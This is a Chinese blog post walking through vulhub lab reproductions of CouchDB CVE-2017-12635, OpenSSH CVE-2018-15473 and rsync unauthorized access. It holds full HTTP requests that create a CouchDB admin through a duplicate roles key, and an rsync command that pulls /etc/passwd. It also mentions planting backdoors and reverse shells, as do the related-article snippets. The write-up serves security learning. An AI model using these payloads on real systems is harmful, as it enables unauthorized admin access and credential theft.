CVE-2017-12635,CVE-2018-15473,rsync 未授权访问漏洞复现

已于 2023-11-16 17:52:52 修改
阅读量126 收藏
点赞数
分类专栏: 学习漏洞 文章标签: 服务器 学习 安全 数据库
于 2023-11-16 17:50:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_60584088/article/details/134284167
版权

CVE-2017-12635复现

环境说明:
Apache CouchDB:是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查间语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)

docker-compose build
docker compose up -d

开启靶场环境,访问:http://192.168.217.141:5984/_utils

在这里插入图片描述

这里直接抓包,通过抓包获取到响应

在这里插入图片描述

这里直接按照给的对应响应包直接发送

PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: your-ip:5984
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 90
{
“type”: “user”,
“name”: “vulhub”,
“roles”: [“_admin”],
“password”: “vulhub”
}

  • 回显为403,{“error”:“forbidden”,“reason”:“Only _admin may set roles”},只有管理员才能设置Role角色:

在这里插入图片描述

  • 继续发送两个数据包,

PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: your-ip:5984
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 108
{
“type”: “user”,
“name”: “vulhub”,
“roles”: [“_admin”],
“roles”: [],
“password”: “vulhub”
}

  • 这里回显200成功

在这里插入图片描述
这里是创建管理员,账户密码均为vulhub
有了管理员,那么就直接尝试登录
在这里插入图片描述

成功登录,复现完成

CVE-2018-15473复现

用户名枚举

在这里插入图片描述

rsync 未授权访问漏洞

环境说明:

rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件。

复现:

  • 启动环境,直接rsync连接:

在这里插入图片描述

  • 下载文件:rsync -av rsync://your-ip:873/src/etc/passwd ./
  • 也可以执行文件,写入后门,反弹shell
久恙502
关注
专栏目录
OpenSSH命令注入漏洞复现CVE-2020-15778)
千寻的博客
03-06 1万+
漏洞名称 OpenSSH命令注入漏洞 漏洞编号 CVE-2020-15778 漏洞描述 OpenSSH8.3p1及之前版本中scp的scp.c文件存在操作系统命令注入漏洞。 该漏洞即使在禁用ssh登录的情况下,但是允许使用scp传文件,而且远程服务器允许使用反引号(`)。 攻击者可利用scp复制文件到远程服务器时,执行带有payload的scp命令,从而在后续利用中getshell。 OpenSSH简介 OpenSSH是 SSH(Secure SHell) 协议的免费开源实现。
网络攻防之CVE-2020-15778漏洞复现及修复详细过程
m0_62574258的博客
02-29 3754
OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。(10)可以看到在监听窗口反弹出靶机的shell(root@localhost),攻击成功,即使靶机通过防火墙禁止了ssh远程登录能通过此漏洞远程控制靶机,在shell中输入ls命令查看靶机的根目录文件。漏洞危害:该漏洞危害性很高, 因为一旦入侵成功,攻击者可以尝试在目标系统上的shell上执行恶意代码,执行各种命令,获取系统信息,上传或下载文件,甚至完全控制目标系统。
SUDO(CVE-2021-3156复现)提权&rsync授权访问提权
m0_62207170的博客
03-06 786
SUDO(CVE-2021-3156复现)提权&rsync授权访问提权
漏洞复现-rsync-授权访问】vulfocus/rsync-common
10-16 1449
rsync-授权访问
服务安全-应用协议rsync授权&ssh漏洞复现
heike_Ch的博客
05-10 912
服务端权限认证绕过漏洞](https://github.com/vulhub/vulhub/blob/master/libssh/CVE-2018-10933/README.zh-其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配 置ACL或访问密码,我们将可以读写目标服务器文件。表示在每小时的第17分钟执行run-parts --report /etc/cron.hourly命令。rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件 传输。
CVE-2020-15778 漏洞修复方案
技术小站
06-19 3867
作者系统版本为centos7 临时缓解措施: 可以禁用scp,改用rsync等缓解风险(可能会导致小文件机器内拷贝变慢) 禁用scp命令(此方法不影响ssh使用) mv /usr/bin/scp /usr/bin/scp.bak 恢复scp命令 mv /usr/bin/scp.bak /usr/bin/scp ...
[ vulhub漏洞复现篇 ] vulhub 漏洞集合(含漏洞复现文章连接)
qq_51577576的博客
09-21 1万+
介绍:Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。 计划:这里记录了 vulhub 所有的漏洞,本专栏也会将这些漏洞全部复现,欢迎持续订阅 我也会不定期再中间更新复现文章链接 目的:以复现 vulhub 漏洞为路径,展示不同的渗透思路及手法,同类漏洞我会尽量用多种渗透思路进行复现,不仅仅是提高个人能力,也是想再 CSDN 这个平台认识更多的安全爱好者
漏洞复现 - - - 授权访问漏洞Redis
weixin_67503304的博客
08-13 5083
授权访问漏洞Redis, 通过redis数据备份功能,往WEB网站根目录写入一句话木马,利用shell得到WEB网站权限,通过定时任务反弹Shell,写SSH公钥,实现免密登录linux服务器
OpenSSH 命令注入漏洞(CVE-2020-15778)复现
热门推荐
weixin_47531489的博客
07-20 1万+
1 简介 OpenSSH是SSH(SecureSHell)协议的免费开源实现。OpenSSH是个SSH的软件,linux/unix都用openssh软件提供SSH服务。scp 是 secure copy 的缩写, scp 是 linux 系统下基于 ssh 登陆进行安全的远程文件拷贝命令。 2 漏洞概述 该漏洞编号CVE-2020-15778。OpenSSH的8.3p1及之前版本中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。目前绝大多数linux系统受影响。 漏洞等.
CVE-2020-15778:OpenSSH命令注入漏洞复现
m0_48520508的博客
12-08 2310
0x01 简介 OpenSSH是SSH(Secure SHell)协议的免费开源实现。OpenSSH是个SSH的软件,linux/unix都用openssh软件提供SSH服务。scp 是 secure copy 的缩写, scp 是 linux 系统下基于 ssh 登陆进行安全的远程文件拷贝命令。 0x02 漏洞概述 该漏洞编号CVE-2020-15778。OpenSSH的8.3p1及之前版本中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。目前绝大多数linux系统受影响。 0
OpenSSH 命令注入漏洞(CVE-2020-15778)
gjgj的博客
06-18 9324
OpenSSH命令注入漏洞复现 1、简介 OpenSSH 是 SSH (Secure SHell) 协议的免费开源实现,ssh主要就是用来远程控制计算机,或传输文件,OpenSSH是使用SSH透过计算机网络加密通讯的实现。 2、漏洞概述 该漏洞是存在于scp在拷贝文件时产生的一个代码注入漏洞,攻击者可以利用此漏洞执行任意命令,比如:反弹shell, 3、影响版本 openssh <= openssh-8.3p1 1 4、实验环境 首先下载openssh,版本要符合漏洞影响的版本 服务端:apt-g
OpenSSH 命令注入漏洞(CVE-2020-15778)修复
u013259937的博客
04-27 3996
OpenSSH 命令注入漏洞(CVE-2020-15778)修复 详细描述: OpenSSH(OpenBSD Secure Shell)是OpenBSD计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效阻止窃听、连接劫持以及其他网络级的攻击。 OpenSSH 8.4p1及之前版本中的scp的scp.c文件存在命令注入漏洞。该漏洞源于外部输入数据构造可执行命令过程中,网络系统或产品正确过滤其中的特殊元素。攻击者可利用该漏洞执行非法命令。 解决办法:
tcp三次握手和四次挥手
qq_25096749的博客
11-06 594
三次握手与四次挥手
u盘怎么重装电脑系统_u盘重装电脑系统步骤和详细教程【新手宝典】
电脑技术分享网的博客
11-06 796
在电脑无法正常启动或需要重新安装系统时,U盘启动盘成为一项重要的技术手段。它利用U盘的便携性,结合启动盘制作工具,可以快速制作出能够引导电脑进入特定操作环境的启动盘。这种启动盘不仅方便用户进行系统重装,还支持多种电脑维护任务,如清除密码、引导修复、磁盘分区管理等。
Linux的基本指令(一)
最新发布
2302_80378107的博客
11-08 661
对于目录,该命令列出该目录下的所有子目录与文件。对于文件,将列出文件名以及信息。-a列出目录下的所有文件,包括以 . 开头的隐含文件。-l列出文件的详细信息。
学Linux的第六天
weixin_73929563的博客
10-31 1339
groupadd参数 工作组名-g GID:指定新工作组的GID,默认值是已有的最大的GID加1-r: 建立一个系统组账号,与-g不同时使用时则分配一个1999的GID//添加一个组ID为2000,组名为group2的新组groupmod参数 工作组名-g GID——为用户组指定新的组标识号-n新用户组——将用户组的名字改为新名字修改用户组的名称和用户组的GID值将组group1的GID修改为3000,组名修改为group11。
弹性裸金属服务器和传统裸金属服务器有什么区别?
wanhengwangluo的博客
11-05 511
弹性裸金属服务器则可以完全独享服务器的物理资源,没有虚拟化层的成本,在管理权限上某些底层硬件管理和配置还是需要依赖云服务提供商,并不能有着完全的硬件控制权限。弹性裸金属服务器能够支持企业快速部署新的硬件和软件系统,让用户可以快速利用最新的科学技术,预先配置了硬件和自动化部署流程,可以更快的进行调配资源;弹性裸金属服务器是一种结合了传统裸金属服务器和云计算资源两种特点的服务器,是一种云计算服务,下面我们就来了解一下弹性裸金属服务器和传统裸金属服务器之间有什么区别吧!
Intel AMT技术在服务器硬件监控中的应用与解读
MXsoft618的博客
11-06 426
本文将针对监控易软件中Intel AMT技术的监测指标进行解读,并探讨其在服务器硬件监控中的应用。通过监控易软件中的Intel AMT监测指标,运维团队可以实时掌握服务器的各项硬件性能指标,及时发现并解决潜在问题。同时,Intel AMT还支持远程管理和控制功能,运维团队可以通过网络远程访问服务器,进行硬件配置、软件安装等操作,大大提高了运维效率。通过监控易软件中的相关监测指标,运维团队可以更加全面、深入地了解服务器的硬件状态,确保服务器的稳定运行和业务的连续性。
linux tar 打包为多个文件
SZ170110231的博客
11-06 306
将从 tar 输出的文件数据拆分成多个 80MB 的部分,文件会按顺序命名为 my_folder.tar.aa, my_folder.tar.ab, my_folder.tar.ac 等。将 my_folder 目录打包成一个 tar 文件并通过管道 (|) 输出到标准输出。
CVE-2017-3506 漏洞POC复现详细解析
同时,“cve-2017-3506复现”指的是如何在安全研究环境中重现这个漏洞,这对于了解漏洞细节、评估漏洞影响和测试潜在的补丁非常关键。 最后,在压缩包文件名称列表中只有一个文件“CVE-2017-3506-Poc.py”。这个...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值